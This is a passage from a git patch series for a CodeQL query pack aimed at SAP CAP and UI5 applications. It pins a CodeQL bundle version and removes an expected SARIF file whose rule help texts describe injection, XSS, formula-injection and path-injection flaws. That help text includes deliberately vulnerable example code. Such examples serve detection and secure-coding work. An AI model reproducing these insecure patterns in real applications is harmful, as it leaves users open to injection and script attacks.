From 2e52b660f4d8bf8592e66f12f45084427d2a8356 Mon Sep 17 00:00:00 2001
From: Mauro Baluda
Date: Wed, 22 May 2024 16:22:31 +0200
Subject: [PATCH 01/15] Fixed codeql bundle version to 2.15.1
---
 .github/workflows/code_scanning.yml | 1 +
 1 file changed, 1 insertion(+)
diff --git a/.github/workflows/code_scanning.yml b/.github/workflows/code_scanning.yml
index f7f42e705..1eff49e99 100644
--- a/.github/workflows/code_scanning.yml
+++ b/.github/workflows/code_scanning.yml
@@ -61,6 +61,7 @@ jobs:
 with:
 languages: javascript
 config-file: ./.github/codeql/codeql-config.yaml
+ tools: https://github.com/github/codeql-action/releases/download/codeql-bundle-v2.15.1/codeql-bundle-linux64.tar.gz
 debug: true
 - name: Perform CodeQL Analysis
From cc7ebfaf28e67fda7289dd40a44ea8982501e7f8 Mon Sep 17 00:00:00 2001
From: Mauro Baluda
Date: Wed, 22 May 2024 16:24:42 +0200
Subject: [PATCH 02/15] Update javascript.sarif.expected
---
 .github/workflows/javascript.sarif.expected | 23938 +-----------------
 1 file changed, 347 insertions(+), 23591 deletions(-)
diff --git a/.github/workflows/javascript.sarif.expected b/.github/workflows/javascript.sarif.expected
index 619cca50c..b27b1ebbf 100644
--- a/.github/workflows/javascript.sarif.expected
+++ b/.github/workflows/javascript.sarif.expected
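Review bot: The added `tools:` line pins the CodeQL bundle by a bare release URL but records nothing about why this version was chosen or what depends on it; the expected SARIF in `.github/workflows/javascript.sarif.expected` is tied to the CLI version (the removed file reports `"semanticVersion" : "2.16.4"`), so a later bump of this URL silently breaks that comparison unless the expected file is regenerated alongside it. I would add a comment above the line: `# Pin the CodeQL CLI so analysis output stays comparable with javascript.sarif.expected; bump both together.` The asset is trusted on its URL alone unless codeql-action verifies the download, so the pin guards against version drift but not against a substituted release artifact — worth stating in the same comment if that trade-off is accepted. The enclosing `with:` step starts before this hunk.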
@@ -1,23596 +1,352 @@ { - "$schema" : "https://json.schemastore.org/sarif-2.1.0.json", - "version" : "2.1.0", - "runs" : [ { - "tool" : { - "driver" : { - "name" : "CodeQL", - "organization" : "GitHub", - "semanticVersion" : "2.16.4", - "notifications" : [ { - "id" : "cli/expected-extracted-files/javascript", - "name" : "cli/expected-extracted-files/javascript", - "shortDescription" : { - "text" : "Expected extracted files" - }, - "fullDescription" : { - "text" : "Files appearing in the source archive that are expected to be extracted." - }, - "defaultConfiguration" : { - "enabled" : true - }, - "properties" : { - "tags" : [ "expected-extracted-files", "telemetry" ], - "languageDisplayName" : "JavaScript" - } - }, { - "id" : "cli/expected-extracted-files/python", - "name" : "cli/expected-extracted-files/python", - "shortDescription" : { - "text" : "Expected extracted files" - }, - "fullDescription" : { - "text" : "Files appearing in the source archive that are expected to be extracted." - }, - "defaultConfiguration" : { - "enabled" : true - }, - "properties" : { - "tags" : [ "expected-extracted-files", "telemetry" ], - "languageDisplayName" : "Python" - } - } ], - "rules" : [ ] - }, - "extensions" : [ { - "name" : "advanced-security/javascript-sap-cap-queries", - "semanticVersion" : "0.1.0+b1fbd510971da2b65671de1296cb2c3288f6b252", - "rules" : [ { - "id" : "js/cap-sql-injection", - "name" : "js/cap-sql-injection", - "shortDescription" : { - "text" : "CQL query built from user-controlled sources" - }, - "fullDescription" : { - "text" : "Building a CQL query from user-controlled sources is vulnerable to insertion of malicious code by the user." 
- }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# CQL query built from user-controlled sources\n\nIf a database query is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries.\n\n## Recommendation\n\nCAP's intrinsic data querying engine is immune with regards to SQL injections that are introduced by query parameter values that are derived from malicious user input. CQL statements are transformed into prepared statements that are executed in SQL databases such as SAP HANA. \nInjections are still possible even via CQL when the query structure (e.g. target entity, columns etc.) is based on user input.\n\n## Examples\n\nThis CAP application uses user submitted input as entity and column in a CQL query without any validation.\n\n``` javascript\nconst entity = \nconst column = \nSELECT.from(entity).columns(column)\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n", - "markdown" : "# CQL query built from user-controlled sources\n\nIf a database query is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries.\n\n## Recommendation\n\nCAP's intrinsic data querying engine is immune with regards to SQL injections that are introduced by query parameter values that are derived from malicious user input. CQL statements are transformed into prepared statements that are executed in SQL databases such as SAP HANA. \nInjections are still possible even via CQL when the query structure (e.g. target entity, columns etc.) 
is based on user input.\n\n## Examples\n\nThis CAP application uses user submitted input as entity and column in a CQL query without any validation.\n\n``` javascript\nconst entity = \nconst column = \nSELECT.from(entity).columns(column)\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n" - }, - "properties" : { - "tags" : [ "security" ], - "description" : "Building a CQL query from user-controlled sources is vulnerable to insertion of\n malicious code by the user.", - "id" : "js/cap-sql-injection", - "kind" : "path-problem", - "name" : "CQL query built from user-controlled sources", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "8.8" - } - }, { - "id" : "js/cap-log-injection", - "name" : "js/cap-log-injection", - "shortDescription" : { - "text" : "CAP Log injection" - }, - "fullDescription" : { - "text" : "Building log entries from user-controlled sources is vulnerable to insertion of forged log entries by a malicious user." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# CAP Log Injection\n\nIf unsanitized user input is written to a log entry using the CAP Node.js logging API, a malicious user may be able to forge new log entries.\n\nCAP Node.js offers a CLRF-safe logging API that should be used for application log entries that are logged as plaintext. If the entry is interpreted as HTML, then arbitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nCAP applications need to care for escaping user data that is used as input parameter for application logging. 
It's recommended to make use of an existing Encoder such as OWASP ESAPI.\n\n## Examples\n\nThis CAP service directly logs what the user submitted via the `req` request.\n\n``` javascript\nimport cds from '@sap/cds'\nconst { Books } = cds.entities ('sap.capire.bookshop')\n\nclass SampleVulnService extends cds.ApplicationService { init(){\n this.on ('submitOrder', async req => {\n const {book,quantity} = req.data\n const LOG = cds.log(\"nodejs\");\n LOG.info(\"test\" + book); // Log injection alert\n })\n\n return super.init()\n}}\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n", - "markdown" : "# CAP Log Injection\n\nIf unsanitized user input is written to a log entry using the CAP Node.js logging API, a malicious user may be able to forge new log entries.\n\nCAP Node.js offers a CLRF-safe logging API that should be used for application log entries that are logged as plaintext. If the entry is interpreted as HTML, then arbitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nCAP applications need to care for escaping user data that is used as input parameter for application logging. 
It's recommended to make use of an existing Encoder such as OWASP ESAPI.\n\n## Examples\n\nThis CAP service directly logs what the user submitted via the `req` request.\n\n``` javascript\nimport cds from '@sap/cds'\nconst { Books } = cds.entities ('sap.capire.bookshop')\n\nclass SampleVulnService extends cds.ApplicationService { init(){\n this.on ('submitOrder', async req => {\n const {book,quantity} = req.data\n const LOG = cds.log(\"nodejs\");\n LOG.info(\"test\" + book); // Log injection alert\n })\n\n return super.init()\n}}\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n" - }, - "properties" : { - "tags" : [ "security" ], - "description" : "Building log entries from user-controlled sources is vulnerable to\n insertion of forged log entries by a malicious user.", - "id" : "js/cap-log-injection", - "kind" : "path-problem", - "name" : "CAP Log injection", - "precision" : "medium", - "problem.severity" : "error", - "security-severity" : "6.1" - } - } ], - "locations" : [ { - "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/src/", - "description" : { - "text" : "The QL pack root directory." - } - }, { - "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/src/qlpack.yml", - "description" : { - "text" : "The QL pack definition file." 
- } - } ] - }, { - "name" : "advanced-security/javascript-sap-ui5-queries", - "semanticVersion" : "0.5.0+b1fbd510971da2b65671de1296cb2c3288f6b252", - "rules" : [ { - "id" : "js/ui5-xss", - "name" : "js/ui5-xss", - "shortDescription" : { - "text" : "UI5 Client-side cross-site scripting" - }, - "fullDescription" : { - "text" : "Writing user input directly to a UI5 View allows for a cross-site scripting vulnerability." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Client-side cross-site scripting\n\nReceiving text from the user, most notably through a control, and rendering it as HTML in another control can lead to a cross-site scripting vulnerability.\n\n## Recommendation\n\n### Preventing XSS Involving User Defined Control\n\nIf the XSS attack vector includes a user-defined control, then we can mitigate the issue by sanitizing the user-provided input in the implementation of the control:\n- Where possible, define the property type to something other than `string` or `any`. If a value should be used, then opt for the `enum` type which only allows a predefined set of strings.\n- Use escaping functions in `sap.base.security`. Relevant sanitizers include `encodeXML` and `encodeHTML`.\n- When using API with `apiVersion: 2` (Semantic Rendering), do not use `RenderManager.unsafeHtml` unless the control property `sanitizeContent` is set to `true`.\n- When using the now-deprecated older API with `RenderManager.write` or `RenderManager.writeAttribute`, use their respective counterparts `RenderManager.writeEscaped` and `RenderManager.writeAttributeEscaped` which sanitizes their rendered contents.\n\n### Preventing XSS Not Involving User Defined Control\n\nAn XSS attack vector can still exist even when no user-defined control is used. 
In this case, a model property or a control property act as an intermediate step when external data is passed in.\nIn this case, the UI5 application should not use the property as is, but should sanitize the contents before reading it. Such sanitization can take place in the controller or in the view declaration using expression bindings.\n\n## Example\n\n### Custom Control with Custom Rendering Method\n\nThis custom control `vulnerable.control.xss` calls `unsafeHtml` on a given `RenderManager` instance in its static renderer function. Since its `text` property is an unrestricted string type, it can point to a string with contents that can be interpreted as HTML. If it is the case, `unsafeHtml` will render the string, running a possibly embedded JavaScript code in it.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\"], function (Control) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"string\" } } },\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(oControl.getText()); // sink\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\nThis is the same custom control without the possibility of XSS using several means of sanitization: The property `text` is enforced to a non-string type, hence disallows unrestricted strings (This is espcially applicable if the expected input is a number anyways). 
Also, the `sap.base.security.encodeXML` function is used to escape HTML control characters.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\", \"sap/base/security/encodeXML\"], function (Control, encodeXML) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"int\" } } }, // constrain the type\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(encodeXML(oControl.getText()); // encode using security functions\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\n### Library Control\n\nThis example contains only library controls that are not user-defined. The untrusted user input flows from `sap.m.Input` and directly flows out via `sap.ui.core.HTML` through the model property `input` as declared in the `onInit` method of the controller.\n\n``` xml\n\n \t \n \n\n```\n\n``` javascript\nsap.ui.define([\"sap/ui/core/mvc/Controller\", \"sap/ui/model/json/JSONModel\"],\n function (Controller, JSONModel) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function () {\n var oData = { input: null };\n var oModel = new JSONModel(oData);\n this.getView().setModel(oModel);\n },\n });\n },\n);\n```\n\nThe issue can be resolved by setting the `HTML` control's `sanitizeContent` attribute to true.\n\n``` xml\n\n \n \n\n```\n\n## References\n\n- OWASP: [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n- SAP UI5 Documentation: [Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/91f0bd316f4d1014b6dd926db0e91070.html) in UI5.\n- SAP UI5 Documentation: [Prevention of Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/4de64e2e191f4a7297d4fd2d1e233a2d.html) in UI5.\n- SAP UI5 Documentation: [API Documentation of sap.ui.core.RenderManager](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.RenderManager).\n- SAP UI5 Documentation: [Defining Control 
Properties](https://sapui5.hana.ondemand.com/sdk/#/topic/ac56d92162ed47ff858fdf1ce26c18c4.html).\n- SAP UI5 Documentation: [Expression Binding](https://sapui5.hana.ondemand.com/sdk/#/topic/daf6852a04b44d118963968a1239d2c0).\n- SAP UI5 API Reference: [`sap.ui.core.HTML`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.HTML%23methods/setSanitizeContent).\n- Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n- Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", - "markdown" : "# Client-side cross-site scripting\n\nReceiving text from the user, most notably through a control, and rendering it as HTML in another control can lead to a cross-site scripting vulnerability.\n\n## Recommendation\n\n### Preventing XSS Involving User Defined Control\n\nIf the XSS attack vector includes a user-defined control, then we can mitigate the issue by sanitizing the user-provided input in the implementation of the control:\n- Where possible, define the property type to something other than `string` or `any`. If a value should be used, then opt for the `enum` type which only allows a predefined set of strings.\n- Use escaping functions in `sap.base.security`. Relevant sanitizers include `encodeXML` and `encodeHTML`.\n- When using API with `apiVersion: 2` (Semantic Rendering), do not use `RenderManager.unsafeHtml` unless the control property `sanitizeContent` is set to `true`.\n- When using the now-deprecated older API with `RenderManager.write` or `RenderManager.writeAttribute`, use their respective counterparts `RenderManager.writeEscaped` and `RenderManager.writeAttributeEscaped` which sanitizes their rendered contents.\n\n### Preventing XSS Not Involving User Defined Control\n\nAn XSS attack vector can still exist even when no user-defined control is used. 
In this case, a model property or a control property act as an intermediate step when external data is passed in.\nIn this case, the UI5 application should not use the property as is, but should sanitize the contents before reading it. Such sanitization can take place in the controller or in the view declaration using expression bindings.\n\n## Example\n\n### Custom Control with Custom Rendering Method\n\nThis custom control `vulnerable.control.xss` calls `unsafeHtml` on a given `RenderManager` instance in its static renderer function. Since its `text` property is an unrestricted string type, it can point to a string with contents that can be interpreted as HTML. If it is the case, `unsafeHtml` will render the string, running a possibly embedded JavaScript code in it.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\"], function (Control) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"string\" } } },\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(oControl.getText()); // sink\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\nThis is the same custom control without the possibility of XSS using several means of sanitization: The property `text` is enforced to a non-string type, hence disallows unrestricted strings (This is espcially applicable if the expected input is a number anyways). 
Also, the `sap.base.security.encodeXML` function is used to escape HTML control characters.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\", \"sap/base/security/encodeXML\"], function (Control, encodeXML) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"int\" } } }, // constrain the type\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(encodeXML(oControl.getText()); // encode using security functions\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\n### Library Control\n\nThis example contains only library controls that are not user-defined. The untrusted user input flows from `sap.m.Input` and directly flows out via `sap.ui.core.HTML` through the model property `input` as declared in the `onInit` method of the controller.\n\n``` xml\n\n \t \n \n\n```\n\n``` javascript\nsap.ui.define([\"sap/ui/core/mvc/Controller\", \"sap/ui/model/json/JSONModel\"],\n function (Controller, JSONModel) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function () {\n var oData = { input: null };\n var oModel = new JSONModel(oData);\n this.getView().setModel(oModel);\n },\n });\n },\n);\n```\n\nThe issue can be resolved by setting the `HTML` control's `sanitizeContent` attribute to true.\n\n``` xml\n\n \n \n\n```\n\n## References\n\n- OWASP: [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n- SAP UI5 Documentation: [Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/91f0bd316f4d1014b6dd926db0e91070.html) in UI5.\n- SAP UI5 Documentation: [Prevention of Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/4de64e2e191f4a7297d4fd2d1e233a2d.html) in UI5.\n- SAP UI5 Documentation: [API Documentation of sap.ui.core.RenderManager](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.RenderManager).\n- SAP UI5 Documentation: [Defining Control 
Properties](https://sapui5.hana.ondemand.com/sdk/#/topic/ac56d92162ed47ff858fdf1ce26c18c4.html).\n- SAP UI5 Documentation: [Expression Binding](https://sapui5.hana.ondemand.com/sdk/#/topic/daf6852a04b44d118963968a1239d2c0).\n- SAP UI5 API Reference: [`sap.ui.core.HTML`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.HTML%23methods/setSanitizeContent).\n- Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n- Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], - "description" : "Writing user input directly to a UI5 View allows for\n a cross-site scripting vulnerability.", - "id" : "js/ui5-xss", - "kind" : "path-problem", - "name" : "UI5 Client-side cross-site scripting", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "6.1" - } - }, { - "id" : "js/ui5-formula-injection", - "name" : "js/ui5-formula-injection", - "shortDescription" : { - "text" : "UI5 Formula Injection" - }, - "fullDescription" : { - "text" : "Saving data from an uncontrolled remote source using filesystem or local storage leads to disclosure of sensitive information or forgery of entry." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Formula injection\n\nUI5 applications that save local data, fetched from an uncontrolled remote source, into a CSV file format using generic APIs such as [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save) are vulnerable to formula injection, or CSV injection.\n\n## Recommendation\n\n### Escape the leading special characters\n\nCSV cells containing leading special characters such as an equal sign (`=`) may be interpreted as spreadsheet formulas. 
To prevent them from being interpreted these prefixes should be escaped by surrounding the prefixes with single quotes in order to keep them as literal strings.\n\n### Use a dedicated API function\n\nManual construction of a CSV file using string concatenation is prone to mistakes that can lead to security issues. Instead, a dedicated library function should be used. For example, if the target being exported is a [`sap.m.Table`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.m.Table) and the resulting file is to intended to be opened using a spreadsheet program anyways, then using one of the API functions provided by [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet) is the preferred method of achieving the same exporting functionality.\n\n## Example\n\nThe following controller is exporting a CSV file obtained from an event parameter by surrounding it in a pair of semicolons (`;`) as CSV separators.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/Controller\",\n \"sap/ui/core/util/File\"\n ], function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSomeEvent: function(oEvent) {\n let response = oEvent.getProperty(\"someProperty\").someField;\n let csvRow = \";\" + response + \";\";\n File.save(csvRow, \"someFile\", \"csv\", \"text/csv\", \"utf-8\");\n }\n });\n });\n```\n\n## References\n\n- OWASP: [CSV Injection](https://owasp.org/www-community/attacks/CSV_Injection).\n- Common Weakness Enumeration: [CWE-1236](https://cwe.mitre.org/data/definitions/1236.html).\n- SAP UI5 API Reference: [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet).\n- SAP UI5 API Reference: [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n", - "markdown" : "# Formula injection\n\nUI5 applications that save local data, fetched from an uncontrolled remote source, into a CSV 
file format using generic APIs such as [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save) are vulnerable to formula injection, or CSV injection.\n\n## Recommendation\n\n### Escape the leading special characters\n\nCSV cells containing leading special characters such as an equal sign (`=`) may be interpreted as spreadsheet formulas. To prevent them from being interpreted these prefixes should be escaped by surrounding the prefixes with single quotes in order to keep them as literal strings.\n\n### Use a dedicated API function\n\nManual construction of a CSV file using string concatenation is prone to mistakes that can lead to security issues. Instead, a dedicated library function should be used. For example, if the target being exported is a [`sap.m.Table`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.m.Table) and the resulting file is to intended to be opened using a spreadsheet program anyways, then using one of the API functions provided by [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet) is the preferred method of achieving the same exporting functionality.\n\n## Example\n\nThe following controller is exporting a CSV file obtained from an event parameter by surrounding it in a pair of semicolons (`;`) as CSV separators.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/Controller\",\n \"sap/ui/core/util/File\"\n ], function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSomeEvent: function(oEvent) {\n let response = oEvent.getProperty(\"someProperty\").someField;\n let csvRow = \";\" + response + \";\";\n File.save(csvRow, \"someFile\", \"csv\", \"text/csv\", \"utf-8\");\n }\n });\n });\n```\n\n## References\n\n- OWASP: [CSV Injection](https://owasp.org/www-community/attacks/CSV_Injection).\n- Common Weakness Enumeration: [CWE-1236](https://cwe.mitre.org/data/definitions/1236.html).\n- SAP 
UI5 API Reference: [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet).\n- SAP UI5 API Reference: [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-1236" ], - "description" : "Saving data from an uncontrolled remote source using filesystem or local storage\n leads to disclosure of sensitive information or forgery of entry.", - "id" : "js/ui5-formula-injection", - "kind" : "path-problem", - "name" : "UI5 Formula Injection", - "precision" : "medium", - "problem.severity" : "error", - "security-severity" : "7.8" - } - }, { - "id" : "js/ui5-path-injection", - "name" : "js/ui5-path-injection", - "shortDescription" : { - "text" : "UI5 Path Injection" - }, - "fullDescription" : { - "text" : "Constructing path from an uncontrolled remote source to be passed to a filesystem API allows for manipulation of the local filesystem." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Client-side path injection\n\nUI5 applications that access files using a dynamically configured path are vulnerable to injection attacks that allow an attacker to manipulate the file location.\n\n## Recommendation\n\n### Make path argument independent of the user input\n\nIf possible, do not parameterize the path on a user input. Either hardcode the path string in the source, or use only strings that are created within the application.\n\n### Keep an allow-list of safe paths\n\nKeep a strict allow-list of safe paths to load from or send requests to. Before loading a script from a location outside the application or making an API request to a location, check if the path is contained in the list of safe paths. 
Also, make sure that the allow-list is kept up to date.\n\n### Check the script into the repository or use package managers\n\nSince the URL of the script may be pointing to a web server vulnerable to being hijacked, it may be a good idea to check a stable version of the script into the repository to increase the degree of control. If not possible, use a trusted package manager such as `npm`.\n\n## Example\n\n### Including scripts from an untrusted domain\n\n``` javascript\nsap.ui.require([\n \"sap/ui/dom/includeScript\"\n ],\n function(includeScript) {\n includeScript(\"http://some.vulnerable.domain/some-script.js\");\n }\n);\n```\n\nIf the vulnerable domain is outside the organization and controlled by an untrusted third party, this may result in arbitrary code execution in the user's browser.\n\n### Using user input as a name of a file to be saved\n\nSuppose a controller is configured to receive a response from a server as follows.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/core/util/File\"\n ],\n function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function() {\n let oDataV2Model = this.getOwnerComponent().getModel(\"some-ODatav2-model\");\n this.getView().setModel(oDataV2Model);\n },\n \n onSomeEvent: function() {\n let remoteResponse = this.getView().getModel().getProperty(\"someProperty\");\n File.save(\"some-content\", remoteResponse, \"txt\", \"text/plain\", \"utf-8\");\n }\n });\n });\n```\n\nEven if the server which updates the OData V2 model is in a trusted domain such as within the organization, the server may still contain tainted information if the UI5 application in question is vulnerable to other security attacks, say XSS. 
This may allow an attacker to save a file in the victim's local filesystem.\n\n## References\n\n- Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n- Common Weakness Enumeration: [CWE-073](https://cwe.mitre.org/data/definitions/73.html).\n- SAP UI5 API Reference: [`sap.ui.core.util.File`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n- SAP UI5 API Reference: [`sap.ui.dom.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`sap.ui.dom.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeStylesheet).\n- SAP UI5 API Reference: [`jQuery.sap.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`jQuery.sap.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript).\n", - "markdown" : "# Client-side path injection\n\nUI5 applications that access files using a dynamically configured path are vulnerable to injection attacks that allow an attacker to manipulate the file location.\n\n## Recommendation\n\n### Make path argument independent of the user input\n\nIf possible, do not parameterize the path on a user input. Either hardcode the path string in the source, or use only strings that are created within the application.\n\n### Keep an allow-list of safe paths\n\nKeep a strict allow-list of safe paths to load from or send requests to. Before loading a script from a location outside the application or making an API request to a location, check if the path is contained in the list of safe paths. 
Also, make sure that the allow-list is kept up to date.\n\n### Check the script into the repository or use package managers\n\nSince the URL of the script may be pointing to a web server vulnerable to being hijacked, it may be a good idea to check a stable version of the script into the repository to increase the degree of control. If not possible, use a trusted package manager such as `npm`.\n\n## Example\n\n### Including scripts from an untrusted domain\n\n``` javascript\nsap.ui.require([\n \"sap/ui/dom/includeScript\"\n ],\n function(includeScript) {\n includeScript(\"http://some.vulnerable.domain/some-script.js\");\n }\n);\n```\n\nIf the vulnerable domain is outside the organization and controlled by an untrusted third party, this may result in arbitrary code execution in the user's browser.\n\n### Using user input as a name of a file to be saved\n\nSuppose a controller is configured to receive a response from a server as follows.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/core/util/File\"\n ],\n function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function() {\n let oDataV2Model = this.getOwnerComponent().getModel(\"some-ODatav2-model\");\n this.getView().setModel(oDataV2Model);\n },\n \n onSomeEvent: function() {\n let remoteResponse = this.getView().getModel().getProperty(\"someProperty\");\n File.save(\"some-content\", remoteResponse, \"txt\", \"text/plain\", \"utf-8\");\n }\n });\n });\n```\n\nEven if the server which updates the OData V2 model is in a trusted domain such as within the organization, the server may still contain tainted information if the UI5 application in question is vulnerable to other security attacks, say XSS. 
This may allow an attacker to save a file in the victim's local filesystem.\n\n## References\n\n- Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n- Common Weakness Enumeration: [CWE-073](https://cwe.mitre.org/data/definitions/73.html).\n- SAP UI5 API Reference: [`sap.ui.core.util.File`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n- SAP UI5 API Reference: [`sap.ui.dom.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`sap.ui.dom.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeStylesheet).\n- SAP UI5 API Reference: [`jQuery.sap.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`jQuery.sap.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-022", "external/cwe/cwe-035" ], - "description" : "Constructing path from an uncontrolled remote source to be passed\n to a filesystem API allows for manipulation of the local filesystem.", - "id" : "js/ui5-path-injection", - "kind" : "path-problem", - "name" : "UI5 Path Injection", - "precision" : "medium", - "problem.severity" : "error", - "security-severity" : "7.8" - } - }, { - "id" : "js/ui5-log-injection", - "name" : "js/ui5-log-injection", - "shortDescription" : { - "text" : "UI5 Log injection" - }, - "fullDescription" : { - "text" : "Building log entries from user-controlled sources is vulnerable to insertion of forged log entries by a malicious user." 
